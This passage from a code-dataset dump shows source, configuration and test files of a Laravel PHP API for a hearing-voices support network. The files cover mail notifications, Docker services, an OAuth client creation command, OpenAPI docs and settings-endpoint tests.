$passwordResetUrl = route('auth.end-user.password.reset', ['token' => $token]);\n\n $this->dispatchNow(new TemplateMail(\n $this->user->email,\n Arr::get($emailContent, 'end_user.password_reset.subject'),\n Arr::get($emailContent, 'end_user.password_reset.body'),\n new PasswordResetSubstituter($this, $passwordResetUrl)\n ));\n }\n\n /**\n * Send the email verification notification.\n */\n public function sendEmailVerificationNotification(): void\n {\n /** @var array $emailContent */\n $emailContent = Setting::findOrFail('email_content')->value;\n\n $verifyEmailUrl = URL::temporarySignedRoute(\n 'auth.end-user.verification.verify',\n Date::now()->addMinutes(Config::get('auth.verification.expire', 60)),\n ['id' => $this->user->getKey()]\n );\n\n $this->dispatchNow(new TemplateMail(\n $this->user->email,\n Arr::get($emailContent, 'end_user.email_confirmation.subject'),\n Arr::get($emailContent, 'end_user.email_confirmation.body'),\n new EmailConfirmationSubstituter($this, $verifyEmailUrl)\n ));\n }\n}\n"
},
{
"alpha_fraction": 0.5893032550811768,
"alphanum_fraction": 0.6000981330871582,
"avg_line_length": 19.795917510986328,
"blob_id": "6a0eab28aa25ea9927d3df14c1032b3915436f93",
"content_id": "b685a3488a830d395303556013c1278dfa806806",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "YAML",
"length_bytes": 2038,
"license_type": "permissive",
"max_line_length": 56,
"num_lines": 98,
"path": "/docker-compose.yml",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "version: \"3\"\n\nservices:\n api:\n image: hearing-voices-network/api/app\n build:\n context: ./docker/app\n dockerfile: Dockerfile\n environment:\n - APP_ENV=local\n volumes:\n - .:/var/www/html\n networks:\n - app-net\n ports:\n - \"${APP_PORT:-80}:80\"\n restart: on-failure\n\n queue-worker:\n image: hearing-voices-network/api/app\n volumes:\n - .:/var/www/html\n networks:\n - app-net\n command: php artisan queue:listen --tries=1\n restart: on-failure\n\n scheduler:\n image: hearing-voices-network/api/app\n volumes:\n - .:/var/www/html\n networks:\n - app-net\n command: php artisan cv:schedule:loop\n restart: on-failure\n\n node:\n image: hearing-voices-network/api/node\n build:\n context: ./docker/node\n dockerfile: Dockerfile\n volumes:\n - .:/var/www/html\n\n mysql:\n image: mysql:5.7\n environment:\n MYSQL_ROOT_PASSWORD: \"${DB_ROOT_PASS:-secret}\"\n MYSQL_DATABASE: \"${DB_NAME:-connecting_voices}\"\n MYSQL_USER: \"${DB_USER:-connecting_voices}\"\n MYSQL_PASSWORD: \"${DB_PASS:-secret}\"\n volumes:\n - mysql-data:/var/lib/mysql\n networks:\n - app-net\n ports:\n - \"${DB_PORT:-3306}:3306\"\n\n mysql-testing:\n image: mysql:5.7\n environment:\n MYSQL_ROOT_PASSWORD: \"${DB_ROOT_PASS:-secret}\"\n MYSQL_DATABASE: \"${DB_NAME:-connecting_voices}\"\n MYSQL_USER: \"${DB_USER:-connecting_voices}\"\n MYSQL_PASSWORD: \"${DB_PASS:-secret}\"\n networks:\n - app-net\n\n redis:\n image: redis:5.0-alpine\n volumes:\n - redis-data:/data\n networks:\n - app-net\n\n redis-testing:\n image: redis:5.0-alpine\n networks:\n - app-net\n\n troposphere:\n image: hearing-voices-network/api/troposphere\n build:\n context: ./docker/troposphere\n dockerfile: Dockerfile\n volumes:\n - ./aws:/tmp\n command: \"python ${CFN_TEMPLATE:-cloudformation}.py\"\n\nnetworks:\n app-net:\n driver: bridge\n\nvolumes:\n mysql-data:\n driver: local\n redis-data:\n driver: local\n"
},
{
"alpha_fraction": 0.6083915829658508,
"alphanum_fraction": 0.6123875975608826,
"avg_line_length": 29.33333396911621,
"blob_id": "2255ce2c9df514403ae13b16bc6ba981fefa4b80",
"content_id": "9e20d446ca0aab521399934ecac90d23bd1a2007",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1001,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 33,
"path": "/app/Docs/Responses/ResourceDeletedResponse.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Responses;\n\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\MediaType;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Response;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass ResourceDeletedResponse extends Response\n{\n /**\n * @param string|null $objectId\n * @param string|null $resource\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Response\n */\n public static function create(string $objectId = null, string $resource = null): BaseObject\n {\n return parent::create($objectId)\n ->statusCode(200)\n ->description('OK')\n ->content(\n MediaType::json()->schema(\n Schema::object()->properties(\n Schema::string('message')\n ->example(\"The $resource has been deleted.\")\n )\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5510968565940857,
"alphanum_fraction": 0.5527019500732422,
"avg_line_length": 24.95833396911621,
"blob_id": "965a757eac2343cfb7f05e2a185ecc2891dd7b1c",
"content_id": "d727dd51fcdbfbd4aeaa4482c050be0c5255619f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1869,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 72,
"path": "/app/Console/Commands/Cv/Make/ClientCommand.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Console\\Commands\\Cv\\Make;\n\nuse Illuminate\\Console\\Command;\nuse Illuminate\\Support\\Str;\nuse Laravel\\Passport\\ClientRepository;\nuse Laravel\\Passport\\Passport;\n\nclass ClientCommand extends Command\n{\n /**\n * The name and signature of the console command.\n *\n * @var string\n */\n protected $signature = \"cv:make:client\n {name : The OAuth client's name}\n {redirect-uri : The OAuth client's redirect URI}\n {--first-party : Specify a first party client}\";\n\n /**\n * The console command description.\n *\n * @var string\n */\n protected $description = 'Create a new OAuth client';\n\n /**\n * @var \\Laravel\\Passport\\ClientRepository\n */\n protected $clients;\n\n /**\n * AdminCommand constructor.\n *\n * @param \\Laravel\\Passport\\ClientRepository $clients\n */\n public function __construct(ClientRepository $clients)\n {\n parent::__construct();\n\n $this->clients = $clients;\n }\n\n /**\n * Execute the console command.\n *\n * @throws \\Throwable\n */\n public function handle(): void\n {\n $client = Passport::client()->forceFill([\n 'user_id' => null,\n 'name' => $this->argument('name'),\n 'secret' => Str::random(40),\n 'redirect' => $this->argument('redirect-uri'),\n 'personal_access_client' => false,\n 'password_client' => false,\n 'first_party_client' => $this->option('first-party'),\n 'revoked' => false,\n ]);\n\n $client->save();\n\n $this->info('New client created successfully.');\n $this->line('<comment>Client ID:</comment> ' . $client->id);\n $this->line('<comment>Client secret:</comment> ' . $client->secret);\n }\n}\n"
},
{
"alpha_fraction": 0.5123271346092224,
"alphanum_fraction": 0.5183403491973877,
"avg_line_length": 22.09722137451172,
"blob_id": "0539bac6d005db31dfefd25377708334d07a624a",
"content_id": "908a24a9a52a17c213384e248e6736990531cb08",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1663,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 72,
"path": "/tests/Unit/Support/EnumTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Unit\\Support;\n\nuse App\\Support\\Enum;\nuse Tests\\TestCase;\n\nclass EnumTest extends TestCase\n{\n const TEST_ONE = 'one';\n const TEST_TWO = 'two';\n const DIFFERENT_THREE = 'three';\n\n /** @test */\n public function class_with_no_constants(): void\n {\n $noConstants = new class {};\n\n $enum = new Enum($noConstants);\n $constants = $enum->get('');\n\n $this->assertCount(0, $constants);\n }\n\n /** @test */\n public function fully_qualified_class_name_works(): void\n {\n $enum = new Enum(static::class);\n $constants = $enum->get('TEST');\n\n $this->assertCount(2, $constants);\n $this->assertEquals([\n 'TEST_ONE' => 'one',\n 'TEST_TWO' => 'two',\n ], $constants);\n }\n\n /** @test */\n public function instance_works(): void\n {\n $enum = new Enum($this);\n $constants = $enum->get('TEST');\n\n $this->assertCount(2, $constants);\n $this->assertEquals([\n 'TEST_ONE' => 'one',\n 'TEST_TWO' => 'two',\n ], $constants);\n }\n\n /** @test */\n public function get_values_works(): void\n {\n $enum = new Enum($this);\n $constants = $enum->getValues('TEST');\n\n $this->assertCount(2, $constants);\n $this->assertEquals([0 => 'one', 1 => 'two'], $constants);\n }\n\n /** @test */\n public function get_keys_works(): void\n {\n $enum = new Enum($this);\n $constants = $enum->getkeys('TEST');\n\n $this->assertCount(2, $constants);\n $this->assertEquals([0 => 'TEST_ONE', 1 => 'TEST_TWO'], $constants);\n }\n}\n"
},
{
"alpha_fraction": 0.65976482629776,
"alphanum_fraction": 0.6799591183662415,
"avg_line_length": 33.619468688964844,
"blob_id": "2a0a9c9de317a241de74cf45b64f60f55db2062c",
"content_id": "8108c7aa760dd3b66027756e0828de7143d4081e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 3912,
"license_type": "permissive",
"max_line_length": 875,
"num_lines": 113,
"path": "/tests/TestCase.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests;\n\nuse App\\Models\\File;\nuse App\\Support\\Filesystem;\nuse Illuminate\\Foundation\\Testing\\RefreshDatabase;\nuse Illuminate\\Foundation\\Testing\\TestCase as BaseTestCase;\nuse Illuminate\\Foundation\\Testing\\WithFaker;\nuse Illuminate\\Support\\Facades\\DB;\nuse Tests\\Support\\TestResponse;\n\n/**\n * @method TestResponse postJson(string $uri, array $data = [], array $headers = [])\n * @method TestResponse putJson(string $uri, array $data = [], array $headers = [])\n * @method TestResponse patchJson(string $uri, array $data = [], array $headers = [])\n * @method TestResponse json(string $method, string $uri, array $data = [], array $headers = [])\n */\nabstract class TestCase extends BaseTestCase\n{\n use CreatesApplication;\n use RefreshDatabase;\n use WithFaker;\n\n /**\n * Clean up the testing environment before the next test.\n *\n * @return void\n */\n protected function tearDown(): void\n {\n (new Filesystem())->clearDir(storage_path('testing'), ['.gitignore']);\n\n parent::tearDown();\n }\n\n /**\n * Overridden from parent to provide custom TestResponse class.\n *\n * @param \\Illuminate\\Http\\Response $response\n * @return \\Tests\\Support\\TestResponse\n */\n protected function createTestResponse($response): TestResponse\n {\n return TestResponse::fromBaseResponse($response);\n }\n\n /**\n * Visit the given URI with a GET request, expecting a JSON response.\n *\n * @param string $uri\n * @param array $data\n * @param array $headers\n * @return \\Tests\\Support\\TestResponse\n */\n public function getJson($uri, array $data = [], array $headers = []): TestResponse\n {\n $query = http_build_query($data);\n\n return parent::getJson(\"{$uri}?{$query}\", [], $headers);\n }\n\n /**\n * Visit the given URI with a DELETE request, expecting a JSON response.\n *\n * @param string $uri\n * @param array $data\n * @param array $headers\n * @return \\Tests\\Support\\TestResponse\n */\n public function deleteJson($uri, array $data = [], array $headers = []): TestResponse\n {\n $query = http_build_query($data);\n\n return parent::deleteJson(\"{$uri}?{$query}\", [], $headers);\n }\n\n /**\n * @param bool $isPrivate\n * @return \\App\\Models\\File\n */\n protected function createPngFile(bool $isPrivate = false): File\n {\n /** @var \\App\\Models\\File $file */\n $file = File::create([\n 'filename' => 'test.png',\n 'mime_type' => 'image/png',\n 'is_private' => $isPrivate,\n ]);\n\n return $file->uploadBase64EncodedFile(\n <<<EOT\n 
data:image/png;base64,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\n EOT\n );\n }\n\n /**\n * @param string ...$tables\n */\n protected function truncateTables(string ...$tables): void\n {\n DB::statement('SET FOREIGN_KEY_CHECKS=0');\n\n foreach ($tables as $table) {\n DB::table($table)->truncate();\n }\n\n DB::statement('SET FOREIGN_KEY_CHECKS=1');\n }\n}\n"
},
{
"alpha_fraction": 0.4583987295627594,
"alphanum_fraction": 0.4819466173648834,
"avg_line_length": 16.69444465637207,
"blob_id": "ac89927b3a3c7bbec865078943cbb3ff48a48b6f",
"content_id": "0da5159fade2c4a2c1a7fdf3cf55ed1c7e34127b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 637,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 36,
"path": "/config/connecting_voices.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nreturn [\n\n 'repo_url' => 'https://github.com/hearing-voices-network/api',\n\n 'frontend_url' => env('FRONTEND_URL'),\n\n 'admin_url' => env('ADMIN_URL'),\n\n 'age_requirement' => [\n 'min' => 13,\n 'max' => 100,\n ],\n\n 'pagination' => [\n 'default' => 10,\n 'max' => 100,\n ],\n\n 'file_tokens' => [\n // 5 minutes.\n 'expiry_time' => 60 * 5,\n ],\n\n 'admin_email' => '[email protected]', // TODO: Change this once confirmed by client.\n\n 'date_format' => 'd/m/Y',\n\n 'datetime_format' => 'd/m/Y H:i:s',\n\n 'otp_enabled' => env('OTP_ENABLED', true),\n\n];\n"
},
{
"alpha_fraction": 0.393781840801239,
"alphanum_fraction": 0.3951070308685303,
"avg_line_length": 37.69822311401367,
"blob_id": "c8e3f5fc2151975bda1b3c0dd3e9a3dcb2d81c01",
"content_id": "24450f2d1dbaf7a7a109d5e529eed13e1dce0536",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 19620,
"license_type": "permissive",
"max_line_length": 103,
"num_lines": 507,
"path": "/tests/Feature/V1/SettingControllerTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Feature\\V1;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Models\\Admin;\nuse App\\Models\\Audit;\nuse App\\Models\\EndUser;\nuse App\\Models\\Setting;\nuse Illuminate\\Http\\Response;\nuse Illuminate\\Support\\Facades\\Event;\nuse Laravel\\Passport\\Passport;\nuse Tests\\TestCase;\n\nclass SettingControllerTest extends TestCase\n{\n /*\n * Index.\n */\n\n /** @test */\n public function guest_can_index(): void\n {\n $response = $this->getJson('/v1/settings');\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function end_user_can_index(): void\n {\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->getJson('/v1/settings');\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function admin_can_index(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/settings');\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function structure_correct_for_index(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/settings');\n\n $response->assertJsonStructure([\n 'data' => [\n 'frontend_content' => [\n 'home_page' => [\n 'title',\n ],\n ],\n 'email_content' => [\n 'admin' => [\n 'new_contribution' => [\n 'subject',\n 'body',\n ],\n 'updated_contribution' => [\n 'subject',\n 'body',\n ],\n 'new_end_user' => [\n 'subject',\n 'body',\n ],\n 'password_reset' => [\n 'subject',\n 'body',\n ],\n ],\n 'end_user' => [\n 'email_confirmation' => [\n 'subject',\n 'body',\n ],\n 'password_reset' => [\n 'subject',\n 'body',\n ],\n 'contribution_approved' => [\n 'subject',\n 'body',\n ],\n 'contribution_rejected' => [\n 'subject',\n 'body',\n ],\n ],\n ],\n ],\n ]);\n }\n\n /** @test */\n public function values_correct_for_index(): void\n {\n $frontendContent = Setting::findOrFail('frontend_content')->value;\n $emailContent = Setting::findOrFail('email_content')->value;\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/settings');\n\n $response->assertJsonFragment([\n [\n 'frontend_content' => [\n 'home_page' => [\n 'title' => $frontendContent['home_page']['title'],\n ],\n ],\n 'email_content' => [\n 'admin' => [\n 'new_contribution' => [\n 'subject' => $emailContent['admin']['new_contribution']['subject'],\n 'body' => $emailContent['admin']['new_contribution']['body'],\n ],\n 'updated_contribution' => [\n 'subject' => $emailContent['admin']['updated_contribution']['subject'],\n 'body' => $emailContent['admin']['updated_contribution']['body'],\n ],\n 'new_end_user' => [\n 'subject' => $emailContent['admin']['new_end_user']['subject'],\n 'body' => $emailContent['admin']['new_end_user']['body'],\n ],\n 'password_reset' => [\n 'subject' => $emailContent['admin']['password_reset']['subject'],\n 'body' => $emailContent['admin']['password_reset']['body'],\n ],\n ],\n 'end_user' => [\n 'email_confirmation' => [\n 'subject' => $emailContent['end_user']['email_confirmation']['subject'],\n 'body' => $emailContent['end_user']['email_confirmation']['body'],\n ],\n 'password_reset' => [\n 'subject' => $emailContent['end_user']['password_reset']['subject'],\n 'body' => $emailContent['end_user']['password_reset']['body'],\n ],\n 'contribution_approved' => [\n 'subject' => $emailContent['end_user']['contribution_approved']['subject'],\n 'body' => 
$emailContent['end_user']['contribution_approved']['body'],\n ],\n 'contribution_rejected' => [\n 'subject' => $emailContent['end_user']['contribution_rejected']['subject'],\n 'body' => $emailContent['end_user']['contribution_rejected']['body'],\n ],\n ],\n ],\n ],\n ]);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_index(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\User $user */\n $user = factory(Admin::class)->create()->user;\n\n Passport::actingAs($user);\n\n $this->getJson('/v1/settings');\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($user): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_READ\n && $event->getDescription() === 'Viewed settings.'\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n\n /*\n * Update.\n */\n\n /** @test */\n public function guest_cannot_update(): void\n {\n $response = $this->putJson('/v1/settings');\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_cannot_update(): void\n {\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->putJson('/v1/settings');\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function admin_can_update(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->putJson('/v1/settings', [\n 'frontend_content' => [\n 'home_page' => [\n 'title' => 'frontend_content/home_page/title',\n ],\n ],\n 'email_content' => [\n 'admin' => [\n 'new_contribution' => [\n 'subject' => 'email_content/admin/new_contribution/subject',\n 'body' => 'email_content/admin/new_contribution/body',\n ],\n 'updated_contribution' => [\n 'subject' => 'email_content/admin/updated_contribution/subject',\n 'body' => 'email_content/admin/updated_contribution/body',\n ],\n 'new_end_user' => [\n 'subject' => 'email_content/admin/new_end_user/subject',\n 'body' => 'email_content/admin/new_end_user/body',\n ],\n 'password_reset' => [\n 'subject' => 'email_content/admin/password_reset/subject',\n 'body' => 'email_content/admin/password_reset/body',\n ],\n ],\n 'end_user' => [\n 'email_confirmation' => [\n 'subject' => 'email_content/end_user/email_confirmation/subject',\n 'body' => 'email_content/end_user/email_confirmation/body',\n ],\n 'password_reset' => [\n 'subject' => 'email_content/end_user/password_reset/subject',\n 'body' => 'email_content/end_user/password_reset/body',\n ],\n 'contribution_approved' => [\n 'subject' => 'email_content/end_user/contribution_approved/subject',\n 'body' => 'email_content/end_user/contribution_approved/body',\n ],\n 'contribution_rejected' => [\n 'subject' => 'email_content/end_user/contribution_rejected/subject',\n 'body' => 'email_content/end_user/contribution_rejected/body',\n ],\n ],\n ],\n ]);\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function structure_correct_for_update(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->putJson('/v1/settings', [\n 'frontend_content' => [\n 'home_page' => [\n 'title' => 'frontend_content/home_page/title',\n ],\n ],\n 'email_content' => [\n 'admin' => [\n 'new_contribution' => [\n 'subject' => 'email_content/admin/new_contribution/subject',\n 'body' => 'email_content/admin/new_contribution/body',\n ],\n 
'updated_contribution' => [\n 'subject' => 'email_content/admin/updated_contribution/subject',\n 'body' => 'email_content/admin/updated_contribution/body',\n ],\n 'new_end_user' => [\n 'subject' => 'email_content/admin/new_end_user/subject',\n 'body' => 'email_content/admin/new_end_user/body',\n ],\n 'password_reset' => [\n 'subject' => 'email_content/admin/password_reset/subject',\n 'body' => 'email_content/admin/password_reset/body',\n ],\n ],\n 'end_user' => [\n 'email_confirmation' => [\n 'subject' => 'email_content/end_user/email_confirmation/subject',\n 'body' => 'email_content/end_user/email_confirmation/body',\n ],\n 'password_reset' => [\n 'subject' => 'email_content/end_user/password_reset/subject',\n 'body' => 'email_content/end_user/password_reset/body',\n ],\n 'contribution_approved' => [\n 'subject' => 'email_content/end_user/contribution_approved/subject',\n 'body' => 'email_content/end_user/contribution_approved/body',\n ],\n 'contribution_rejected' => [\n 'subject' => 'email_content/end_user/contribution_rejected/subject',\n 'body' => 'email_content/end_user/contribution_rejected/body',\n ],\n ],\n ],\n ]);\n\n $response->assertJsonStructure([\n 'data' => [\n 'frontend_content' => [\n 'home_page' => [\n 'title',\n ],\n ],\n 'email_content' => [\n 'admin' => [\n 'new_contribution' => [\n 'subject',\n 'body',\n ],\n 'updated_contribution' => [\n 'subject',\n 'body',\n ],\n 'new_end_user' => [\n 'subject',\n 'body',\n ],\n 'password_reset' => [\n 'subject',\n 'body',\n ],\n ],\n 'end_user' => [\n 'email_confirmation' => [\n 'subject',\n 'body',\n ],\n 'password_reset' => [\n 'subject',\n 'body',\n ],\n 'contribution_approved' => [\n 'subject',\n 'body',\n ],\n 'contribution_rejected' => [\n 'subject',\n 'body',\n ],\n ],\n ],\n ],\n ]);\n }\n\n /** @test */\n public function values_correct_for_update(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->putJson('/v1/settings', [\n 'frontend_content' => [\n 'home_page' => [\n 'title' => 'frontend_content/home_page/title',\n ],\n ],\n 'email_content' => [\n 'admin' => [\n 'new_contribution' => [\n 'subject' => 'email_content/admin/new_contribution/subject',\n 'body' => 'email_content/admin/new_contribution/body',\n ],\n 'updated_contribution' => [\n 'subject' => 'email_content/admin/updated_contribution/subject',\n 'body' => 'email_content/admin/updated_contribution/body',\n ],\n 'new_end_user' => [\n 'subject' => 'email_content/admin/new_end_user/subject',\n 'body' => 'email_content/admin/new_end_user/body',\n ],\n 'password_reset' => [\n 'subject' => 'email_content/admin/password_reset/subject',\n 'body' => 'email_content/admin/password_reset/body',\n ],\n ],\n 'end_user' => [\n 'email_confirmation' => [\n 'subject' => 'email_content/end_user/email_confirmation/subject',\n 'body' => 'email_content/end_user/email_confirmation/body',\n ],\n 'password_reset' => [\n 'subject' => 'email_content/end_user/password_reset/subject',\n 'body' => 'email_content/end_user/password_reset/body',\n ],\n 'contribution_approved' => [\n 'subject' => 'email_content/end_user/contribution_approved/subject',\n 'body' => 'email_content/end_user/contribution_approved/body',\n ],\n 'contribution_rejected' => [\n 'subject' => 'email_content/end_user/contribution_rejected/subject',\n 'body' => 'email_content/end_user/contribution_rejected/body',\n ],\n ],\n ],\n ]);\n\n $response->assertJson([\n 'data' => [\n 'frontend_content' => [\n 'home_page' => [\n 'title' => 'frontend_content/home_page/title',\n ],\n 
],\n 'email_content' => [\n 'admin' => [\n 'new_contribution' => [\n 'subject' => 'email_content/admin/new_contribution/subject',\n 'body' => 'email_content/admin/new_contribution/body',\n ],\n 'updated_contribution' => [\n 'subject' => 'email_content/admin/updated_contribution/subject',\n 'body' => 'email_content/admin/updated_contribution/body',\n ],\n 'new_end_user' => [\n 'subject' => 'email_content/admin/new_end_user/subject',\n 'body' => 'email_content/admin/new_end_user/body',\n ],\n 'password_reset' => [\n 'subject' => 'email_content/admin/password_reset/subject',\n 'body' => 'email_content/admin/password_reset/body',\n ],\n ],\n 'end_user' => [\n 'email_confirmation' => [\n 'subject' => 'email_content/end_user/email_confirmation/subject',\n 'body' => 'email_content/end_user/email_confirmation/body',\n ],\n 'password_reset' => [\n 'subject' => 'email_content/end_user/password_reset/subject',\n 'body' => 'email_content/end_user/password_reset/body',\n ],\n 'contribution_approved' => [\n 'subject' => 'email_content/end_user/contribution_approved/subject',\n 'body' => 'email_content/end_user/contribution_approved/body',\n ],\n 'contribution_rejected' => [\n 'subject' => 'email_content/end_user/contribution_rejected/subject',\n 'body' => 'email_content/end_user/contribution_rejected/body',\n ],\n ],\n ],\n ],\n ]);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_update(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\User $user */\n $user = factory(Admin::class)->create()->user;\n\n Passport::actingAs($user);\n\n $this->putJson('/v1/settings');\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($user): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_UPDATE\n && $event->getDescription() === 'Updated settings.'\n && $event->getIpAddress() === '127.0.0.1'\n && 